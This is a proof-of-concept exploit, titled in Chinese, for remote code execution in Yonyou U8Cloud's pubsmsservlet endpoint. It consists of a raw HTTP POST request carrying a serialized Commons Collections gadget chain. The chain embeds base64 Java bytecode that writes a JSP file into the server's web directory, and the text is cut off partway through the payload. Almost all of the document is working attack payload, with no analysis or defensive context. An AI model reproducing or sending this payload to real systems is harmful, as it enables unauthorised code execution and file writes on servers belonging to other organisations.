用友U8Cloud pubsmsservlet 远程代码执行漏洞

POST /service/pubsmsservlet HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 5570
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

<org.apache.commons.collections4.bag.TreeBag serialization="custom">
  <org.apache.commons.collections4.bag.TreeBag>
    <default/>
    <org.apache.commons.collections4.comparators.TransformingComparator>
      <decorated class="org.apache.commons.collections4.comparators.ComparableComparator"/>
      <transformer class="org.apache.commons.collections4.functors.ChainedTransformer">
        <iTransformers>
          <org.apache.commons.collections4.functors.ConstantTransformer>
            <iConstant class="java-class">com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter</iConstant>
          </org.apache.commons.collections4.functors.ConstantTransformer>
          <org.apache.commons.collections4.functors.InstantiateTransformer>
            <iParamTypes>
              <java-class>javax.xml.transform.Templates</java-class>
            </iParamTypes>
            <iArgs>
              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
                <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
                  <default>
                    <__name>xcodes</__name>
                    <__bytecodes>
                      <byte-array>yv66vgAAADQAcwoAHQAyBwAzCAA0CgA1ADYJADcAOAgAOQoAOgA7CAA8BwA9CgAJADIKAD4APwoACQBACgAJAEEKAAkAQgoAQwBECgBFAEYJADcARwoAPgBICABJCABKBwBLCgAVAEwHAE0KABcATgoAFwBPCgAXAEgKABUASAcAUAcAUQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwBSAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQANU3RhY2tNYXBUYWJsZQcAUwcAPQcAVAcAVQEACDxjbGluaXQ+BwBQAQAKU291cmNlRmlsZQEAFnB1YnNtc3NlcnZsZXRfZXhwLmphdmEMAB4AHwEAEXB1YnNtc3NlcnZsZXRfZXhwAQAYL3B1YnNtc3NlcnZsZXRfZXhwLmNsYXNzBwBWDABXAFgHAFkMAFoAWwEAR+mUmeivrzog5peg5rOV5LuOIGNsYXNzcGF0aCDkuK3mib7liLAgcHVic21zc2VydmxldF9leHAuY2xhc3Mg5paH5Lu244CCBwBcDABdAF4BAF/or7fnoa7kv50gcHVic21zc2VydmxldF9leHAuY2xhc3Mg5bey57yW6K+R77yM5bm25LiU5Zyo6L+Q6KGMIEpBUiDml7YgY2xhc3NwYXRoIOiuvue9ruato+ehruOAggEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwBTDABfAGAMAGEAYgwAYwAfDABkAGUHAGYMAGcAagcAawwAbABtDABuAFsMAG8AHwEAJEQ6XFU4Q0VSUFx3ZWJhcHBzXHU4Y193ZWJcZXJyb3IxLmpzcAECDTwlQCBwYWdlIGNvbnRlbnRUeXBlPSJ0ZXh0L2h0bWw7Y2hhcnNldD1nYjIzMTIiICU+IDxodG1sPiA8aGVhZD4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iemgtY24iPiA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1nYjIzMTIiPiA8dGl0bGU+TkM8L3RpdGxlPiA8L2hlYWQ+IDxib2R5PiA8ZGl2IGFsaWduPSJjZW50ZXIiPiDmirHmrYnvvIzlj5HnlJ/plJnor6/vvIFpZDogPCVvdXQucHJpbnRsbihqYXZhLnV0aWwuVVVJRC5yYW5kb21VVUlEKCkudG9TdHJpbmcoKSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPiA8L2Rpdj4gPGRpdiBhbGlnbj0iY2VudGVyIj4gPGZvbnQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmQiIGNvbG9yPSIjMDAwMGZmIiBzaXplPSI0Ij48L2ZvbnQ+PC9kaXY+IDwvYm9keT4gPC9odG1sPgEAEmphdmEvaW8vRmlsZVdyaXRlcgwAHgBwAQATamF2YS9pby9QcmludFdyaXRlcgwAHgBxDAByAF4BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAAJbQgEAE1tMamF2YS9sYW5nL1N0cmluZzsBAA9qYXZhL2xhbmcvQ2xhc3MBABNnZXRSZXNvdXJjZUFzU3RyZWFtAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9pby9JbnB1dFN0cmVhbTsBABBqYXZhL2xhbmcvU3lzdGVtAQADZXJyAQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARyZWFkAQAHKFtCSUkpSQEABXdyaXRlAQAHKFtCSUkpVgEABWZsdXNoAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEAA291dAEABWNsb3NlAQAWKExqYXZhL2xhbmcvU3RyaW5nO1opVgEAEyhMamF2YS9pby9Xcml0ZXI7KVYBAAVwcmludAAhAAIAHQAAAAAABQABAB4AHwABACAAAAAdAAEAAQAAAAUqtwABsQAAAAEAIQAAAAYAAQAAAAwAAQAiACMAAgAgAAAAGQAAAAMAAAABsQAAAAEAIQAAAAYAAQAAACQAJAAAAAQAAQAlAAEAIgAmAAIAIAAAABkAAAAEAAAAAbEAAAABACEAAAAGAAEAAAApACQAAAAEAAEAJQAJACcAKAACACAAAADkAAQABwAAAGgSAhIDtgAETCvHABSyAAUSBrYAB7IABRIItgAHsbsACVm3AApNEQQAvAg6BCsZBAMZBL62AAtZPgKfAA4sGQQDHbYADKf/6Cy2AA0stgAOOgW4AA8ZBbYAEDoGsgARGQa2AAcrtgASsQAAAAIAIQAAAD4ADwAAAC0ACAAvAAwAMAAUADEAHAAyAB0ANgAlADgALAA5ADwAOgBHADwASwA9AFEAQABbAEEAYwBCAGcAQwApAAAAJgAD/AAdBwAq/gAOBwArAAcALP8AGgAFBwAtBwAqBwArAQcALAAAACQAAAAEAAEAHAAIAC4AHwABACAAAAB8AAQABAAAACsSE0sSFEy7ABVZKgO3ABZNuwAXWSy3ABhOLSu2ABkttgAaLLYAG6cABEuxAAEAAAAmACkAHAACACEAAAAqAAoAAAARAAMAEgAGABQAEAAVABkAFgAeABcAIgAYACYAHQApABoAKgAeACkAAAAHAAJpBwAvAAACADAAAAACADEAaQAAAAoAAQBFAEMAaAAJ</byte-array>
                    </__bytecodes>
      ...[已截断]